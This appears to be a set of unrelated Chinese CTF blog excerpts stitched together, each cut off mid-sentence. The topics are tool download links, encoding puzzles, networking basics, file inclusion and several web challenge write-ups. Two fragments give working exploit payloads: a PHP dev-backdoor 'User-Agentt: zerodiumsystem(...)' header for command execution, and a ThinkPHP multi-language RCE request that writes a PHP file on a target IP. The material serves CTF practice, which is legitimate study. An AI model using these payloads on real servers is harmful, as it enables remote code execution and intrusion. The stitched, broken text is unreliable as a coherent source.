一、前言近期在做一些ctf题,其中会涉及到许多工具,起初我会使用百度网盘在每一篇博客放置对应的工具,但因网盘上传有上限,所以现在我将练习中所用到所有的工具放置在这篇文章中。需要下载的小伙伴可随时拿取,分享有效期为永久分享。常用工具及常用网站为实时分享!!!二、常用工具ctf_tools编码解码加解密工具链接:https://pan.baidu.com/s/1IKdT_cr_-r_V1nmCbS3PDw提取码:n6of2.010Editor编辑器链接:https://pan.baidu.com/s/1VCaCaidhnD7yXs5AU9uJ1g提取码:jr6z3.WinHex16进制编辑器链接:
初次接触CTF的Misc方向,在这里详细记录一下。1.准备工具:CTFtoolsCTFCracktools010editor2.题目准备攻防世界下载附件,如图。解压得到cipher.txt。 然后记事本打开:看到出现了A-F的字符,初步判定是十六进制,即hex文件。复制,使用CTFtools,常见解码-Hex-str: 得到result处的结果。看到46ESAB,猜想是BASE64编码,但是由于BASE64的可打印字符只有+、/、0~9、A~Z、a~z,不存在“_”,所以从UEs开始才是真正的BASE64编码线索。得到了截开的线索,我们直接尝试用CTFCracktools转字符串: PK,fl
目录【Misc】哇库哇库【Misc】显卡坏了赛后看官方wp给的脚本:【Web】easy_eval【Web】repairman【Crypto】easy_base【Crypto】天知地知(赛后做出)【Crypto】凯撒密码【Reverse】你newbee吗【OSINT】天上的路【OSINT】都可以黑【Pwn】leave_msg【Pwn】easy_login【WARMUP】热身题目赛后根据官方WriteUp做的题【Misc】简单密码1、伪加密2、zip方式解压docx3、字节逆序4、处理zipfile6、base全家桶(1)base92(2)base85-IPv6(3)base58(4)base16
首先进入靶场如下 按照习惯,BP先抓一波包结合题目说的 题目利用了PHP某一开发版本的重大后门,可以利用某写东西进行代码执行。于是想到伪协议操作一下发送给reapter发现伪协议 嗯 不得行不过响应包有个东西引起注意百度发现好家伙 这里有东西 这家伙 有漏洞可以用在Connection字段下面加上User-Agentt:zerodiumsystem("ls/");注意zerodium后面拼接函数发送好家伙!有东西然后替换成这个User-Agentt:zerodiumsystem("cat/flag"); 提交 就完事儿了
目录前置知识导图:TCP/IP体系结构(IP和端口):IP是什么:是计算机在互联网上的唯一标识(坐标,代号),用于在互联网中寻找计算机。内网(局域网)IP和公网(互联网)IP:内网IP:路由以内的网络,可以连接互联网,但是互联网无法直接连接内网(需要端口映射)如何判断自己的电脑是内网还是公网:公网IP:互联网IP地址。端口是什么:是应用程序(服务)在计算机中的唯一标识。HTTP协议--网站访问的基础:BS架构:浏览器Browser---发送请求--->服务器Server---响应--->浏览器BrowserHTTP协议是什么:超文本传输协议特点:请求消息: HTTP常见有八种请求方式,常用
前言CTF(CaptureTheFlag)中文一般译作夺旗赛,在网络安全领域中指的是网络安全技术人员之间进行技术竞技的一种比赛形式。CTF起源于1996年DEFCON全球黑客大会,以代替之前黑客们通过互相发起真实攻击进行技术比拼的方式。是目前青少年,最喜欢参加的竞赛之一。如何入门?首先,我们必须要了解什么CTF的比赛规则,一般的CTF比赛分为以下两个阶段:1.线上选拔比赛:主要考察的题目范围包括:1.Web安全,2.Reverse(逆向工程)3.Crypto(密码学)4.PWN(二进制)5.Misc(一些混合杂项的电脑知识)2.线下总决赛主要考察:1.AWD(AttackWithDefense
目录web签到题web2考查点:1.判断sql注入回显位置2.查当前数据库名称3.查看数据库表的数量4.查表的名字5.查flag表列的数量6.查flag表列的名字7.查flag表记录的数量8.查flag表记录值web3web4web5 web6web签到题whereisflag?直接F12去找一下 找到 Y3Rmc2hvd3s1YzYyZWE0Mi04M2E5LTRhNDUtODRiMi00NzJkZGViZTcxNGF9通过base64解密,拿到flagweb2查看了hint,直接使用hint中的payload考查点:基本的SQL注入多表联合查询在用户名处注入sql语句,密码随意1.判断
web1Thinkphplang多语言RCE漏洞,直接打GET/index.php?+config-create+/+/tmp/keep.phpHTTP/1.1Host:47.98.124.175:8080Cache-Control:max-age=0Upgrade-Insecure-Requests:1User-Agent:Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/108.0.0.0Safari/537.36Accept:text/html,application/xhtml+x
1、文件包含概念程序开发人员会把重复使用的函数、变量、类等数据写到单个文件中,需要使用到里面的数据时直接调用此文件,而无需再次编写,这种文件调用的过程称为文件包含。2、文件包含相关函数require()//找不到被包含文件时产生错误,停止脚本运行include()//找不到被包含文件时产生警告,脚本继续运行include_once()//与include类似,唯一区别就是文件已经被包含则不再包含require_once()//与require类似,唯一区别就是文件已经被包含则不再包含3、文件包含漏洞介绍程序开发人员希望代码更灵活,所以将被包含文件设置成变量,来进行动态调用,但正是由于这种灵活性
CTF-攻防世界web新手入门(全)攻防世界网址1、view_source2、robots3、backup4、cookie5、disabled_button6、weak_auth7、simple_php8、get_post9、xff_referer10、webshell11、command_execution12、simple_js攻防世界网址https://adworld.xctf.org.cn新手篇虽然非常简单,但是对于小白来说这种最常见的常识或者思路可能不熟悉,所以在这里给大家分享一下最不起眼的小常识或者小技巧。1、view_source访问题目场景,如下图鼠标右击不能用,但是F12也可